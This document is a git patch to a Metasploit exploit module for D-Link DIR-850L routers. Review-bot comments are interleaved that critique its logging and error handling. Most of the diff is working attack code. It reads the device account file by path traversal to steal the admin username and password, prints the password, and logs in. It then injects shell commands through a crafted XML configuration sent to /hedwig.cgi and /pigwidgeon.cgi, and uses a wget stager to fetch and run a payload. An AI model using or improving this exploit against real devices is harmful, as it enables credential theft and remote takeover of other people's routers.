From af583e843c5e464e5cc29ec507ce9335a06d0a16 Mon Sep 17 00:00:00 2001
From: Austin <30811388+realoriginal@users.noreply.github.com>
Date: Fri, 3 Nov 2017 06:21:59 -0400
Subject: [PATCH] Update dlink_850l_unauth_exec.rb
---
.../linux/http/dlink_850l_unauth_exec.rb | 40 +++++++------------
1 file changed, 15 insertions(+), 25 deletions(-)
diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb
index 8f05f151f1..70e1f8e5db 100644
--- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb
+++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb
@@ -1,12 +1,7 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
require 'openssl'
class MetasploitModule < Msf::Exploit::Remote
- Rank = AverageRanking
+ Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
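Review bot: The standard four-line framework header comment is deleted at the top of the file and the commit message gives no reason; restore it if the removal was unintentional. The change from `AverageRanking` to `ExcellentRanking` in the same hunk also needs a justification in the commit description. A later hunk labels one request `# save configuration`, which suggests the module alters state on the device, and a reader should find that side effect documented where the rank is raised. The class body continues outside this hunk.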
@@ -49,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
xml = "\r\n"
xml << "\r\n"
xml << "\r\n"
- xml << " ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml\r\n"
+ xml << " ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml\r\n"
xml << "\r\n"
xml << ""
uid = rand_text_alpha_lower(8)
@@ -68,6 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
parse = res.get_xml_document
username = parse.at('//name').text
password = parse.at('//password').text
+ vprint_status("#{peer} - Retrieved the username/password combo #{username}/#{password}")
return username, password
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
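Review bot: The added `vprint_status` line writes the retrieved password in cleartext to the console, and so into any saved console log or screen capture. Logging only the account name keeps the progress message without spreading the secret, for example `vprint_status("#{peer} - Retrieved credentials for user #{username}")`. The two `parse.at(...).text` calls just above it would also raise on a response that lacks those nodes, since `at` returns nil when nothing matches; that path is not covered by the `rescue` shown here. The enclosing method starts outside this hunk.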
@@ -89,31 +85,25 @@ class MetasploitModule < Msf::Exploit::Remote
end
end
- def hash_passwd(username, password, challenge)
- hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase
- return hash
- end
-
- def login(username, hash, uid)
+ def login
+ username, password = retrieve_creds
+ uid, challenge = retrieve_uid
begin
- data = "id=#{username}&password=#{hash}"
+ hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase
res = send_request_cgi({
'uri' => '/authentication.cgi',
'method' => 'POST',
- 'data' => data,
+ 'data' => "id=#{username}&password=#{hash}",
'cookie' => "uid=#{uid}"
})
- return res
+ return uid
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
end
end
def execute_command(cmd, opts)
- username, password = retrieve_creds
- uid, challenge = retrieve_uid
- hash = hash_passwd(username, password, challenge)
- login(username, hash, uid)
+ uid = login
payload = "\r\n"
payload << "\r\n"
payload << "\r\n"
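Review bot: The rewritten `login` assigns the `/authentication.cgi` response to `res` and then returns `uid` unconditionally, so a nil response or a rejected login looks the same as success to `execute_command`. A guard before the return, such as `fail_with(Failure::Unknown, "#{peer} - No response to the login request") unless res`, would make the failure explicit, along with a check on the response status or body if the success format is known. The same unchecked-response pattern appears in the later hunk, where the `/hedwig.cgi` result is overwritten by the `/pigwidgeon.cgi` request without being inspected. A short comment on `login` stating that it returns the session `uid` would also help, since the name alone no longer suggests a return value.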
@@ -123,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote
payload << " \r\n"
payload << " 1\r\n"
payload << " 604800\r\n"
- payload << " metelesku; (#{cmd};) & exit; \r\n"
+ payload << " #{Rex::Text.rand_text_alpha_lower(8)}; (#{cmd}) \r\n"
payload << " \r\n"
payload << " \r\n"
payload << " 1\r\n"
@@ -140,13 +130,15 @@ class MetasploitModule < Msf::Exploit::Remote
payload << "\r\n"
payload << ""
begin
+ # save configuration
res = send_request_cgi({
'uri' => '/hedwig.cgi',
'method' => 'POST',
'ctype' => 'text/xml',
'data' => payload,
'cookie' => "uid=#{uid}"
- })
+ })
+ # execute configuration
res = send_request_cgi({
'uri' => '/pigwidgeon.cgi',
'method' => 'POST',
@@ -162,9 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit
print_status("#{peer} - Initiating exploitation...")
execute_cmdstager(
- :flavor => :wget,
- :background => true,
- :nodelete => true
+ :flavor => :wget
)
end
end